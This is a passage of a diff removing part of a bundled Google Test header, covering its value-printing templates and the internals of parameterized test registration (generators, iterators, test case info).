-void PrintRawArrayTo(const T a[], size_t count, ::std::ostream* os) {
-  UniversalPrint(a[0], os);
-  for (size_t i = 1; i != count; i++) {
-    *os << ", ";
-    UniversalPrint(a[i], os);
-  }
-}
-
-// Overloads for ::string and ::std::string.
-#if GTEST_HAS_GLOBAL_STRING
-GTEST_API_ void PrintStringTo(const ::string&s, ::std::ostream* os);
-inline void PrintTo(const ::string& s, ::std::ostream* os) {
-  PrintStringTo(s, os);
-}
-#endif  // GTEST_HAS_GLOBAL_STRING
-
-GTEST_API_ void PrintStringTo(const ::std::string&s, ::std::ostream* os);
-inline void PrintTo(const ::std::string& s, ::std::ostream* os) {
-  PrintStringTo(s, os);
-}
-
-// Overloads for ::wstring and ::std::wstring.
-#if GTEST_HAS_GLOBAL_WSTRING
-GTEST_API_ void PrintWideStringTo(const ::wstring&s, ::std::ostream* os);
-inline void PrintTo(const ::wstring& s, ::std::ostream* os) {
-  PrintWideStringTo(s, os);
-}
-#endif  // GTEST_HAS_GLOBAL_WSTRING
-
-#if GTEST_HAS_STD_WSTRING
-GTEST_API_ void PrintWideStringTo(const ::std::wstring&s, ::std::ostream* os);
-inline void PrintTo(const ::std::wstring& s, ::std::ostream* os) {
-  PrintWideStringTo(s, os);
-}
-#endif  // GTEST_HAS_STD_WSTRING
-
-#if GTEST_HAS_TR1_TUPLE || GTEST_HAS_STD_TUPLE_
-// Helper function for printing a tuple.  T must be instantiated with
-// a tuple type.
-template <typename T>
-void PrintTupleTo(const T& t, ::std::ostream* os);
-#endif  // GTEST_HAS_TR1_TUPLE || GTEST_HAS_STD_TUPLE_
-
-#if GTEST_HAS_TR1_TUPLE
-// Overload for ::std::tr1::tuple.  Needed for printing function arguments,
-// which are packed as tuples.
-
-// Overloaded PrintTo() for tuples of various arities.  We support
-// tuples of up-to 10 fields.  The following implementation works
-// regardless of whether tr1::tuple is implemented using the
-// non-standard variadic template feature or not.
-
-inline void PrintTo(const ::std::tr1::tuple<>& t, ::std::ostream* os) {
-  PrintTupleTo(t, os);
-}
-
-template <typename T1>
-void PrintTo(const ::std::tr1::tuple<T1>& t, ::std::ostream* os) {
-  PrintTupleTo(t, os);
-}
-
-template <typename T1, typename T2>
-void PrintTo(const ::std::tr1::tuple<T1, T2>& t, ::std::ostream* os) {
-  PrintTupleTo(t, os);
-}
-
-template <typename T1, typename T2, typename T3>
-void PrintTo(const ::std::tr1::tuple<T1, T2, T3>& t, ::std::ostream* os) {
-  PrintTupleTo(t, os);
-}
-
-template <typename T1, typename T2, typename T3, typename T4>
-void PrintTo(const ::std::tr1::tuple<T1, T2, T3, T4>& t, ::std::ostream* os) {
-  PrintTupleTo(t, os);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5>
-void PrintTo(const ::std::tr1::tuple<T1, T2, T3, T4, T5>& t,
-             ::std::ostream* os) {
-  PrintTupleTo(t, os);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-          typename T6>
-void PrintTo(const ::std::tr1::tuple<T1, T2, T3, T4, T5, T6>& t,
-             ::std::ostream* os) {
-  PrintTupleTo(t, os);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-          typename T6, typename T7>
-void PrintTo(const ::std::tr1::tuple<T1, T2, T3, T4, T5, T6, T7>& t,
-             ::std::ostream* os) {
-  PrintTupleTo(t, os);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-          typename T6, typename T7, typename T8>
-void PrintTo(const ::std::tr1::tuple<T1, T2, T3, T4, T5, T6, T7, T8>& t,
-             ::std::ostream* os) {
-  PrintTupleTo(t, os);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-          typename T6, typename T7, typename T8, typename T9>
-void PrintTo(const ::std::tr1::tuple<T1, T2, T3, T4, T5, T6, T7, T8, T9>& t,
-             ::std::ostream* os) {
-  PrintTupleTo(t, os);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-          typename T6, typename T7, typename T8, typename T9, typename T10>
-void PrintTo(
-    const ::std::tr1::tuple<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10>& t,
-    ::std::ostream* os) {
-  PrintTupleTo(t, os);
-}
-#endif  // GTEST_HAS_TR1_TUPLE
-
-#if GTEST_HAS_STD_TUPLE_
-template <typename... Types>
-void PrintTo(const ::std::tuple<Types...>& t, ::std::ostream* os) {
-  PrintTupleTo(t, os);
-}
-#endif  // GTEST_HAS_STD_TUPLE_
-
-// Overload for std::pair.
-template <typename T1, typename T2>
-void PrintTo(const ::std::pair<T1, T2>& value, ::std::ostream* os) {
-  *os << '(';
-  // We cannot use UniversalPrint(value.first, os) here, as T1 may be
-  // a reference type.  The same for printing value.second.
-  UniversalPrinter<T1>::Print(value.first, os);
-  *os << ", ";
-  UniversalPrinter<T2>::Print(value.second, os);
-  *os << ')';
-}
-
-// Implements printing a non-reference type T by letting the compiler
-// pick the right overload of PrintTo() for T.
-template <typename T>
-class UniversalPrinter {
- public:
-  // MSVC warns about adding const to a function type, so we want to
-  // disable the warning.
-  GTEST_DISABLE_MSC_WARNINGS_PUSH_(4180)
-
-  // Note: we deliberately don't call this PrintTo(), as that name
-  // conflicts with ::testing::internal::PrintTo in the body of the
-  // function.
-  static void Print(const T& value, ::std::ostream* os) {
-    // By default, ::testing::internal::PrintTo() is used for printing
-    // the value.
-    //
-    // Thanks to Koenig look-up, if T is a class and has its own
-    // PrintTo() function defined in its namespace, that function will
-    // be visible here.  Since it is more specific than the generic ones
-    // in ::testing::internal, it will be picked by the compiler in the
-    // following statement - exactly what we want.
-    PrintTo(value, os);
-  }
-
-  GTEST_DISABLE_MSC_WARNINGS_POP_()
-};
-
-// UniversalPrintArray(begin, len, os) prints an array of 'len'
-// elements, starting at address 'begin'.
-template <typename T>
-void UniversalPrintArray(const T* begin, size_t len, ::std::ostream* os) {
-  if (len == 0) {
-    *os << "{}";
-  } else {
-    *os << "{ ";
-    const size_t kThreshold = 18;
-    const size_t kChunkSize = 8;
-    // If the array has more than kThreshold elements, we'll have to
-    // omit some details by printing only the first and the last
-    // kChunkSize elements.
-    // TODO(wan@google.com): let the user control the threshold using a flag.
-    if (len <= kThreshold) {
-      PrintRawArrayTo(begin, len, os);
-    } else {
-      PrintRawArrayTo(begin, kChunkSize, os);
-      *os << ", ..., ";
-      PrintRawArrayTo(begin + len - kChunkSize, kChunkSize, os);
-    }
-    *os << " }";
-  }
-}
-// This overload prints a (const) char array compactly.
-GTEST_API_ void UniversalPrintArray(
-    const char* begin, size_t len, ::std::ostream* os);
-
-// This overload prints a (const) wchar_t array compactly.
-GTEST_API_ void UniversalPrintArray(
-    const wchar_t* begin, size_t len, ::std::ostream* os);
-
-// Implements printing an array type T[N].
-template <typename T, size_t N>
-class UniversalPrinter<T[N]> {
- public:
-  // Prints the given array, omitting some elements when there are too
-  // many.
-  static void Print(const T (&a)[N], ::std::ostream* os) {
-    UniversalPrintArray(a, N, os);
-  }
-};
-
-// Implements printing a reference type T&.
-template <typename T>
-class UniversalPrinter<T&> {
- public:
-  // MSVC warns about adding const to a function type, so we want to
-  // disable the warning.
-  GTEST_DISABLE_MSC_WARNINGS_PUSH_(4180)
-
-  static void Print(const T& value, ::std::ostream* os) {
-    // Prints the address of the value.  We use reinterpret_cast here
-    // as static_cast doesn't compile when T is a function type.
-    *os << "@" << reinterpret_cast<const void*>(&value) << " ";
-
-    // Then prints the value itself.
-    UniversalPrint(value, os);
-  }
-
-  GTEST_DISABLE_MSC_WARNINGS_POP_()
-};
-
-// Prints a value tersely: for a reference type, the referenced value
-// (but not the address) is printed; for a (const) char pointer, the
-// NUL-terminated string (but not the pointer) is printed.
-
-template <typename T>
-class UniversalTersePrinter {
- public:
-  static void Print(const T& value, ::std::ostream* os) {
-    UniversalPrint(value, os);
-  }
-};
-template <typename T>
-class UniversalTersePrinter<T&> {
- public:
-  static void Print(const T& value, ::std::ostream* os) {
-    UniversalPrint(value, os);
-  }
-};
-template <typename T, size_t N>
-class UniversalTersePrinter<T[N]> {
- public:
-  static void Print(const T (&value)[N], ::std::ostream* os) {
-    UniversalPrinter<T[N]>::Print(value, os);
-  }
-};
-template <>
-class UniversalTersePrinter<const char*> {
- public:
-  static void Print(const char* str, ::std::ostream* os) {
-    if (str == NULL) {
-      *os << "NULL";
-    } else {
-      UniversalPrint(string(str), os);
-    }
-  }
-};
-template <>
-class UniversalTersePrinter<char*> {
- public:
-  static void Print(char* str, ::std::ostream* os) {
-    UniversalTersePrinter<const char*>::Print(str, os);
-  }
-};
-
-#if GTEST_HAS_STD_WSTRING
-template <>
-class UniversalTersePrinter<const wchar_t*> {
- public:
-  static void Print(const wchar_t* str, ::std::ostream* os) {
-    if (str == NULL) {
-      *os << "NULL";
-    } else {
-      UniversalPrint(::std::wstring(str), os);
-    }
-  }
-};
-#endif
-
-template <>
-class UniversalTersePrinter<wchar_t*> {
- public:
-  static void Print(wchar_t* str, ::std::ostream* os) {
-    UniversalTersePrinter<const wchar_t*>::Print(str, os);
-  }
-};
-
-template <typename T>
-void UniversalTersePrint(const T& value, ::std::ostream* os) {
-  UniversalTersePrinter<T>::Print(value, os);
-}
-
-// Prints a value using the type inferred by the compiler.  The
-// difference between this and UniversalTersePrint() is that for a
-// (const) char pointer, this prints both the pointer and the
-// NUL-terminated string.
-template <typename T>
-void UniversalPrint(const T& value, ::std::ostream* os) {
-  // A workarond for the bug in VC++ 7.1 that prevents us from instantiating
-  // UniversalPrinter with T directly.
-  typedef T T1;
-  UniversalPrinter<T1>::Print(value, os);
-}
-
-typedef ::std::vector<string> Strings;
-
-// TuplePolicy<TupleT> must provide:
-// - tuple_size
-//     size of tuple TupleT.
-// - get<size_t I>(const TupleT& t)
-//     static function extracting element I of tuple TupleT.
-// - tuple_element<size_t I>::type
-//     type of element I of tuple TupleT.
-template <typename TupleT>
-struct TuplePolicy;
-
-#if GTEST_HAS_TR1_TUPLE
-template <typename TupleT>
-struct TuplePolicy {
-  typedef TupleT Tuple;
-  static const size_t tuple_size = ::std::tr1::tuple_size<Tuple>::value;
-
-  template <size_t I>
-  struct tuple_element : ::std::tr1::tuple_element<I, Tuple> {};
-
-  template <size_t I>
-  static typename AddReference<
-      const typename ::std::tr1::tuple_element<I, Tuple>::type>::type get(
-      const Tuple& tuple) {
-    return ::std::tr1::get<I>(tuple);
-  }
-};
-template <typename TupleT>
-const size_t TuplePolicy<TupleT>::tuple_size;
-#endif  // GTEST_HAS_TR1_TUPLE
-
-#if GTEST_HAS_STD_TUPLE_
-template <typename... Types>
-struct TuplePolicy< ::std::tuple<Types...> > {
-  typedef ::std::tuple<Types...> Tuple;
-  static const size_t tuple_size = ::std::tuple_size<Tuple>::value;
-
-  template <size_t I>
-  struct tuple_element : ::std::tuple_element<I, Tuple> {};
-
-  template <size_t I>
-  static const typename ::std::tuple_element<I, Tuple>::type& get(
-      const Tuple& tuple) {
-    return ::std::get<I>(tuple);
-  }
-};
-template <typename... Types>
-const size_t TuplePolicy< ::std::tuple<Types...> >::tuple_size;
-#endif  // GTEST_HAS_STD_TUPLE_
-
-#if GTEST_HAS_TR1_TUPLE || GTEST_HAS_STD_TUPLE_
-// This helper template allows PrintTo() for tuples and
-// UniversalTersePrintTupleFieldsToStrings() to be defined by
-// induction on the number of tuple fields.  The idea is that
-// TuplePrefixPrinter<N>::PrintPrefixTo(t, os) prints the first N
-// fields in tuple t, and can be defined in terms of
-// TuplePrefixPrinter<N - 1>.
-//
-// The inductive case.
-template <size_t N>
-struct TuplePrefixPrinter {
-  // Prints the first N fields of a tuple.
-  template <typename Tuple>
-  static void PrintPrefixTo(const Tuple& t, ::std::ostream* os) {
-    TuplePrefixPrinter<N - 1>::PrintPrefixTo(t, os);
-    GTEST_INTENTIONAL_CONST_COND_PUSH_()
-    if (N > 1) {
-    GTEST_INTENTIONAL_CONST_COND_POP_()
-      *os << ", ";
-    }
-    UniversalPrinter<
-        typename TuplePolicy<Tuple>::template tuple_element<N - 1>::type>
-        ::Print(TuplePolicy<Tuple>::template get<N - 1>(t), os);
-  }
-
-  // Tersely prints the first N fields of a tuple to a string vector,
-  // one element for each field.
-  template <typename Tuple>
-  static void TersePrintPrefixToStrings(const Tuple& t, Strings* strings) {
-    TuplePrefixPrinter<N - 1>::TersePrintPrefixToStrings(t, strings);
-    ::std::stringstream ss;
-    UniversalTersePrint(TuplePolicy<Tuple>::template get<N - 1>(t), &ss);
-    strings->push_back(ss.str());
-  }
-};
-
-// Base case.
-template <>
-struct TuplePrefixPrinter<0> {
-  template <typename Tuple>
-  static void PrintPrefixTo(const Tuple&, ::std::ostream*) {}
-
-  template <typename Tuple>
-  static void TersePrintPrefixToStrings(const Tuple&, Strings*) {}
-};
-
-// Helper function for printing a tuple.
-// Tuple must be either std::tr1::tuple or std::tuple type.
-template <typename Tuple>
-void PrintTupleTo(const Tuple& t, ::std::ostream* os) {
-  *os << "(";
-  TuplePrefixPrinter<TuplePolicy<Tuple>::tuple_size>::PrintPrefixTo(t, os);
-  *os << ")";
-}
-
-// Prints the fields of a tuple tersely to a string vector, one
-// element for each field.  See the comment before
-// UniversalTersePrint() for how we define "tersely".
-template <typename Tuple>
-Strings UniversalTersePrintTupleFieldsToStrings(const Tuple& value) {
-  Strings result;
-  TuplePrefixPrinter<TuplePolicy<Tuple>::tuple_size>::
-      TersePrintPrefixToStrings(value, &result);
-  return result;
-}
-#endif  // GTEST_HAS_TR1_TUPLE || GTEST_HAS_STD_TUPLE_
-
-}  // namespace internal
-
-template <typename T>
-::std::string PrintToString(const T& value) {
-  ::std::stringstream ss;
-  internal::UniversalTersePrinter<T>::Print(value, &ss);
-  return ss.str();
-}
-
-}  // namespace testing
-
-#endif  // GTEST_INCLUDE_GTEST_GTEST_PRINTERS_H_
-
-#if GTEST_HAS_PARAM_TEST
-
-namespace testing {
-namespace internal {
-
-// INTERNAL IMPLEMENTATION - DO NOT USE IN USER CODE.
-//
-// Outputs a message explaining invalid registration of different
-// fixture class for the same test case. This may happen when
-// TEST_P macro is used to define two tests with the same name
-// but in different namespaces.
-GTEST_API_ void ReportInvalidTestCaseType(const char* test_case_name,
-                                          const char* file, int line);
-
-template <typename> class ParamGeneratorInterface;
-template <typename> class ParamGenerator;
-
-// Interface for iterating over elements provided by an implementation
-// of ParamGeneratorInterface<T>.
-template <typename T>
-class ParamIteratorInterface {
- public:
-  virtual ~ParamIteratorInterface() {}
-  // A pointer to the base generator instance.
-  // Used only for the purposes of iterator comparison
-  // to make sure that two iterators belong to the same generator.
-  virtual const ParamGeneratorInterface<T>* BaseGenerator() const = 0;
-  // Advances iterator to point to the next element
-  // provided by the generator. The caller is responsible
-  // for not calling Advance() on an iterator equal to
-  // BaseGenerator()->End().
-  virtual void Advance() = 0;
-  // Clones the iterator object. Used for implementing copy semantics
-  // of ParamIterator<T>.
-  virtual ParamIteratorInterface* Clone() const = 0;
-  // Dereferences the current iterator and provides (read-only) access
-  // to the pointed value. It is the caller's responsibility not to call
-  // Current() on an iterator equal to BaseGenerator()->End().
-  // Used for implementing ParamGenerator<T>::operator*().
-  virtual const T* Current() const = 0;
-  // Determines whether the given iterator and other point to the same
-  // element in the sequence generated by the generator.
-  // Used for implementing ParamGenerator<T>::operator==().
-  virtual bool Equals(const ParamIteratorInterface& other) const = 0;
-};
-
-// Class iterating over elements provided by an implementation of
-// ParamGeneratorInterface<T>. It wraps ParamIteratorInterface<T>
-// and implements the const forward iterator concept.
-template <typename T>
-class ParamIterator {
- public:
-  typedef T value_type;
-  typedef const T& reference;
-  typedef ptrdiff_t difference_type;
-
-  // ParamIterator assumes ownership of the impl_ pointer.
-  ParamIterator(const ParamIterator& other) : impl_(other.impl_->Clone()) {}
-  ParamIterator& operator=(const ParamIterator& other) {
-    if (this != &other)
-      impl_.reset(other.impl_->Clone());
-    return *this;
-  }
-
-  const T& operator*() const { return *impl_->Current(); }
-  const T* operator->() const { return impl_->Current(); }
-  // Prefix version of operator++.
-  ParamIterator& operator++() {
-    impl_->Advance();
-    return *this;
-  }
-  // Postfix version of operator++.
-  ParamIterator operator++(int /*unused*/) {
-    ParamIteratorInterface<T>* clone = impl_->Clone();
-    impl_->Advance();
-    return ParamIterator(clone);
-  }
-  bool operator==(const ParamIterator& other) const {
-    return impl_.get() == other.impl_.get() || impl_->Equals(*other.impl_);
-  }
-  bool operator!=(const ParamIterator& other) const {
-    return !(*this == other);
-  }
-
- private:
-  friend class ParamGenerator<T>;
-  explicit ParamIterator(ParamIteratorInterface<T>* impl) : impl_(impl) {}
-  scoped_ptr<ParamIteratorInterface<T> > impl_;
-};
-
-// ParamGeneratorInterface<T> is the binary interface to access generators
-// defined in other translation units.
-template <typename T>
-class ParamGeneratorInterface {
- public:
-  typedef T ParamType;
-
-  virtual ~ParamGeneratorInterface() {}
-
-  // Generator interface definition
-  virtual ParamIteratorInterface<T>* Begin() const = 0;
-  virtual ParamIteratorInterface<T>* End() const = 0;
-};
-
-// Wraps ParamGeneratorInterface<T> and provides general generator syntax
-// compatible with the STL Container concept.
-// This class implements copy initialization semantics and the contained
-// ParamGeneratorInterface<T> instance is shared among all copies
-// of the original object. This is possible because that instance is immutable.
-template<typename T>
-class ParamGenerator {
- public:
-  typedef ParamIterator<T> iterator;
-
-  explicit ParamGenerator(ParamGeneratorInterface<T>* impl) : impl_(impl) {}
-  ParamGenerator(const ParamGenerator& other) : impl_(other.impl_) {}
-
-  ParamGenerator& operator=(const ParamGenerator& other) {
-    impl_ = other.impl_;
-    return *this;
-  }
-
-  iterator begin() const { return iterator(impl_->Begin()); }
-  iterator end() const { return iterator(impl_->End()); }
-
- private:
-  linked_ptr<const ParamGeneratorInterface<T> > impl_;
-};
-
-// Generates values from a range of two comparable values. Can be used to
-// generate sequences of user-defined types that implement operator+() and
-// operator<().
-// This class is used in the Range() function.
-template <typename T, typename IncrementT>
-class RangeGenerator : public ParamGeneratorInterface<T> {
- public:
-  RangeGenerator(T begin, T end, IncrementT step)
-      : begin_(begin), end_(end),
-        step_(step), end_index_(CalculateEndIndex(begin, end, step)) {}
-  virtual ~RangeGenerator() {}
-
-  virtual ParamIteratorInterface<T>* Begin() const {
-    return new Iterator(this, begin_, 0, step_);
-  }
-  virtual ParamIteratorInterface<T>* End() const {
-    return new Iterator(this, end_, end_index_, step_);
-  }
-
- private:
-  class Iterator : public ParamIteratorInterface<T> {
-   public:
-    Iterator(const ParamGeneratorInterface<T>* base, T value, int index,
-             IncrementT step)
-        : base_(base), value_(value), index_(index), step_(step) {}
-    virtual ~Iterator() {}
-
-    virtual const ParamGeneratorInterface<T>* BaseGenerator() const {
-      return base_;
-    }
-    virtual void Advance() {
-      value_ = value_ + step_;
-      index_++;
-    }
-    virtual ParamIteratorInterface<T>* Clone() const {
-      return new Iterator(*this);
-    }
-    virtual const T* Current() const { return &value_; }
-    virtual bool Equals(const ParamIteratorInterface<T>& other) const {
-      // Having the same base generator guarantees that the other
-      // iterator is of the same type and we can downcast.
-      GTEST_CHECK_(BaseGenerator() == other.BaseGenerator())
-          << "The program attempted to compare iterators "
-          << "from different generators." << std::endl;
-      const int other_index =
-          CheckedDowncastToActualType<const Iterator>(&other)->index_;
-      return index_ == other_index;
-    }
-
-   private:
-    Iterator(const Iterator& other)
-        : ParamIteratorInterface<T>(),
-          base_(other.base_), value_(other.value_), index_(other.index_),
-          step_(other.step_) {}
-
-    // No implementation - assignment is unsupported.
-    void operator=(const Iterator& other);
-
-    const ParamGeneratorInterface<T>* const base_;
-    T value_;
-    int index_;
-    const IncrementT step_;
-  };  // class RangeGenerator::Iterator
-
-  static int CalculateEndIndex(const T& begin,
-                               const T& end,
-                               const IncrementT& step) {
-    int end_index = 0;
-    for (T i = begin; i < end; i = i + step)
-      end_index++;
-    return end_index;
-  }
-
-  // No implementation - assignment is unsupported.
-  void operator=(const RangeGenerator& other);
-
-  const T begin_;
-  const T end_;
-  const IncrementT step_;
-  // The index for the end() iterator. All the elements in the generated
-  // sequence are indexed (0-based) to aid iterator comparison.
-  const int end_index_;
-};  // class RangeGenerator
-
-
-// Generates values from a pair of STL-style iterators. Used in the
-// ValuesIn() function. The elements are copied from the source range
-// since the source can be located on the stack, and the generator
-// is likely to persist beyond that stack frame.
-template <typename T>
-class ValuesInIteratorRangeGenerator : public ParamGeneratorInterface<T> {
- public:
-  template <typename ForwardIterator>
-  ValuesInIteratorRangeGenerator(ForwardIterator begin, ForwardIterator end)
-      : container_(begin, end) {}
-  virtual ~ValuesInIteratorRangeGenerator() {}
-
-  virtual ParamIteratorInterface<T>* Begin() const {
-    return new Iterator(this, container_.begin());
-  }
-  virtual ParamIteratorInterface<T>* End() const {
-    return new Iterator(this, container_.end());
-  }
-
- private:
-  typedef typename ::std::vector<T> ContainerType;
-
-  class Iterator : public ParamIteratorInterface<T> {
-   public:
-    Iterator(const ParamGeneratorInterface<T>* base,
-             typename ContainerType::const_iterator iterator)
-        : base_(base), iterator_(iterator) {}
-    virtual ~Iterator() {}
-
-    virtual const ParamGeneratorInterface<T>* BaseGenerator() const {
-      return base_;
-    }
-    virtual void Advance() {
-      ++iterator_;
-      value_.reset();
-    }
-    virtual ParamIteratorInterface<T>* Clone() const {
-      return new Iterator(*this);
-    }
-    // We need to use cached value referenced by iterator_ because *iterator_
-    // can return a temporary object (and of type other then T), so just
-    // having "return &*iterator_;" doesn't work.
-    // value_ is updated here and not in Advance() because Advance()
-    // can advance iterator_ beyond the end of the range, and we cannot
-    // detect that fact. The client code, on the other hand, is
-    // responsible for not calling Current() on an out-of-range iterator.
-    virtual const T* Current() const {
-      if (value_.get() == NULL)
-        value_.reset(new T(*iterator_));
-      return value_.get();
-    }
-    virtual bool Equals(const ParamIteratorInterface<T>& other) const {
-      // Having the same base generator guarantees that the other
-      // iterator is of the same type and we can downcast.
-      GTEST_CHECK_(BaseGenerator() == other.BaseGenerator())
-          << "The program attempted to compare iterators "
-          << "from different generators." << std::endl;
-      return iterator_ ==
-          CheckedDowncastToActualType<const Iterator>(&other)->iterator_;
-    }
-
-   private:
-    Iterator(const Iterator& other)
-          // The explicit constructor call suppresses a false warning
-          // emitted by gcc when supplied with the -Wextra option.
-        : ParamIteratorInterface<T>(),
-          base_(other.base_),
-          iterator_(other.iterator_) {}
-
-    const ParamGeneratorInterface<T>* const base_;
-    typename ContainerType::const_iterator iterator_;
-    // A cached value of *iterator_. We keep it here to allow access by
-    // pointer in the wrapping iterator's operator->().
-    // value_ needs to be mutable to be accessed in Current().
-    // Use of scoped_ptr helps manage cached value's lifetime,
-    // which is bound by the lifespan of the iterator itself.
-    mutable scoped_ptr<const T> value_;
-  };  // class ValuesInIteratorRangeGenerator::Iterator
-
-  // No implementation - assignment is unsupported.
-  void operator=(const ValuesInIteratorRangeGenerator& other);
-
-  const ContainerType container_;
-};  // class ValuesInIteratorRangeGenerator
-
-// INTERNAL IMPLEMENTATION - DO NOT USE IN USER CODE.
-//
-// Stores a parameter value and later creates tests parameterized with that
-// value.
-template <class TestClass>
-class ParameterizedTestFactory : public TestFactoryBase {
- public:
-  typedef typename TestClass::ParamType ParamType;
-  explicit ParameterizedTestFactory(ParamType parameter) :
-      parameter_(parameter) {}
-  virtual Test* CreateTest() {
-    TestClass::SetParam(&parameter_);
-    return new TestClass();
-  }
-
- private:
-  const ParamType parameter_;
-
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(ParameterizedTestFactory);
-};
-
-// INTERNAL IMPLEMENTATION - DO NOT USE IN USER CODE.
-//
-// TestMetaFactoryBase is a base class for meta-factories that create
-// test factories for passing into MakeAndRegisterTestInfo function.
-template <class ParamType>
-class TestMetaFactoryBase {
- public:
-  virtual ~TestMetaFactoryBase() {}
-
-  virtual TestFactoryBase* CreateTestFactory(ParamType parameter) = 0;
-};
-
-// INTERNAL IMPLEMENTATION - DO NOT USE IN USER CODE.
-//
-// TestMetaFactory creates test factories for passing into
-// MakeAndRegisterTestInfo function. Since MakeAndRegisterTestInfo receives
-// ownership of test factory pointer, same factory object cannot be passed
-// into that method twice. But ParameterizedTestCaseInfo is going to call
-// it for each Test/Parameter value combination. Thus it needs meta factory
-// creator class.
-template <class TestCase>
-class TestMetaFactory
-    : public TestMetaFactoryBase<typename TestCase::ParamType> {
- public:
-  typedef typename TestCase::ParamType ParamType;
-
-  TestMetaFactory() {}
-
-  virtual TestFactoryBase* CreateTestFactory(ParamType parameter) {
-    return new ParameterizedTestFactory<TestCase>(parameter);
-  }
-
- private:
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(TestMetaFactory);
-};
-
-// INTERNAL IMPLEMENTATION - DO NOT USE IN USER CODE.
-//
-// ParameterizedTestCaseInfoBase is a generic interface
-// to ParameterizedTestCaseInfo classes. ParameterizedTestCaseInfoBase
-// accumulates test information provided by TEST_P macro invocations
-// and generators provided by INSTANTIATE_TEST_CASE_P macro invocations
-// and uses that information to register all resulting test instances
-// in RegisterTests method. The ParameterizeTestCaseRegistry class holds
-// a collection of pointers to the ParameterizedTestCaseInfo objects
-// and calls RegisterTests() on each of them when asked.
-class ParameterizedTestCaseInfoBase {
- public:
-  virtual ~ParameterizedTestCaseInfoBase() {}
-
-  // Base part of test case name for display purposes.
-  virtual const string& GetTestCaseName() const = 0;
-  // Test case id to verify identity.
-  virtual TypeId GetTestCaseTypeId() const = 0;
-  // UnitTest class invokes this method to register tests in this
-  // test case right before running them in RUN_ALL_TESTS macro.
-  // This method should not be called more then once on any single
-  // instance of a ParameterizedTestCaseInfoBase derived class.
-  virtual void RegisterTests() = 0;
-
- protected:
-  ParameterizedTestCaseInfoBase() {}
-
- private:
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(ParameterizedTestCaseInfoBase);
-};
-
-// INTERNAL IMPLEMENTATION - DO NOT USE IN USER CODE.
-//
-// ParameterizedTestCaseInfo accumulates tests obtained from TEST_P
-// macro invocations for a particular test case and generators
-// obtained from INSTANTIATE_TEST_CASE_P macro invocations for that
-// test case. It registers tests with all values generated by all
-// generators when asked.
-template <class TestCase>
-class ParameterizedTestCaseInfo : public ParameterizedTestCaseInfoBase {
- public:
-  // ParamType and GeneratorCreationFunc are private types but are required
-  // for declarations of public methods AddTestPattern() and
-  // AddTestCaseInstantiation().
-  typedef typename TestCase::ParamType ParamType;
-  // A function that returns an instance of appropriate generator type.
-  typedef ParamGenerator<ParamType>(GeneratorCreationFunc)();
-
-  explicit ParameterizedTestCaseInfo(const char* name)
-      : test_case_name_(name) {}
-
-  // Test case base name for display purposes.
-  virtual const string& GetTestCaseName() const { return test_case_name_; }
-  // Test case id to verify identity.
-  virtual TypeId GetTestCaseTypeId() const { return GetTypeId<TestCase>(); }
-  // TEST_P macro uses AddTestPattern() to record information
-  // about a single test in a LocalTestInfo structure.
-  // test_case_name is the base name of the test case (without invocation
-  // prefix). test_base_name is the name of an individual test without
-  // parameter index. For the test SequenceA/FooTest.DoBar/1 FooTest is
-  // test case base name and DoBar is test base name.
-  void AddTestPattern(const char* test_case_name,
-                      const char* test_base_name,
-                      TestMetaFactoryBase<ParamType>* meta_factory) {
-    tests_.push_back(linked_ptr<TestInfo>(new TestInfo(test_case_name,
-                                                       test_base_name,
-                                                       meta_factory)));
-  }
-  // INSTANTIATE_TEST_CASE_P macro uses AddGenerator() to record information
-  // about a generator.
-  int AddTestCaseInstantiation(const string& instantiation_name,
-                               GeneratorCreationFunc* func,
-                               const char* /* file */,
-                               int /* line */) {
-    instantiations_.push_back(::std::make_pair(instantiation_name, func));
-    return 0;  // Return value used only to run this method in namespace scope.
-  }
-  // UnitTest class invokes this method to register tests in this test case
-  // test cases right before running tests in RUN_ALL_TESTS macro.
-  // This method should not be called more then once on any single
-  // instance of a ParameterizedTestCaseInfoBase derived class.
-  // UnitTest has a guard to prevent from calling this method more then once.
-  virtual void RegisterTests() {
-    for (typename TestInfoContainer::iterator test_it = tests_.begin();
-         test_it != tests_.end(); ++test_it) {
-      linked_ptr<TestInfo> test_info = *test_it;
-      for (typename InstantiationContainer::iterator gen_it =
-               instantiations_.begin(); gen_it != instantiations_.end();
-               ++gen_it) {
-        const string& instantiation_name = gen_it->first;
-        ParamGenerator<ParamType> generator((*gen_it->second)());
-
-        string test_case_name;
-        if ( !instantiation_name.empty() )
-          test_case_name = instantiation_name + "/";
-        test_case_name += test_info->test_case_base_name;
-
-        int i = 0;
-        for (typename ParamGenerator<ParamType>::iterator param_it =
-                 generator.begin();
-             param_it != generator.end(); ++param_it, ++i) {
-          Message test_name_stream;
-          test_name_stream << test_info->test_base_name << "/" << i;
-          MakeAndRegisterTestInfo(
-              test_case_name.c_str(),
-              test_name_stream.GetString().c_str(),
-              NULL,  // No type parameter.
-              PrintToString(*param_it).c_str(),
-              GetTestCaseTypeId(),
-              TestCase::SetUpTestCase,
-              TestCase::TearDownTestCase,
-              test_info->test_meta_factory->CreateTestFactory(*param_it));
-        }  // for param_it
-      }  // for gen_it
-    }  // for test_it
-  }  // RegisterTests
-
- private:
-  // LocalTestInfo structure keeps information about a single test registered
-  // with TEST_P macro.
-  struct TestInfo {
-    TestInfo(const char* a_test_case_base_name,
-             const char* a_test_base_name,
-             TestMetaFactoryBase<ParamType>* a_test_meta_factory) :
-        test_case_base_name(a_test_case_base_name),
-        test_base_name(a_test_base_name),
-        test_meta_factory(a_test_meta_factory) {}
-
-    const string test_case_base_name;
-    const string test_base_name;
-    const scoped_ptr<TestMetaFactoryBase<ParamType> > test_meta_factory;
-  };
-  typedef ::std::vector<linked_ptr<TestInfo> > TestInfoContainer;
-  // Keeps pairs of <Instantiation name, Sequence generator creation function>
-  // received from INSTANTIATE_TEST_CASE_P macros.
-  typedef ::std::vector<std::pair<string, GeneratorCreationFunc*> >
-      InstantiationContainer;
-
-  const string test_case_name_;
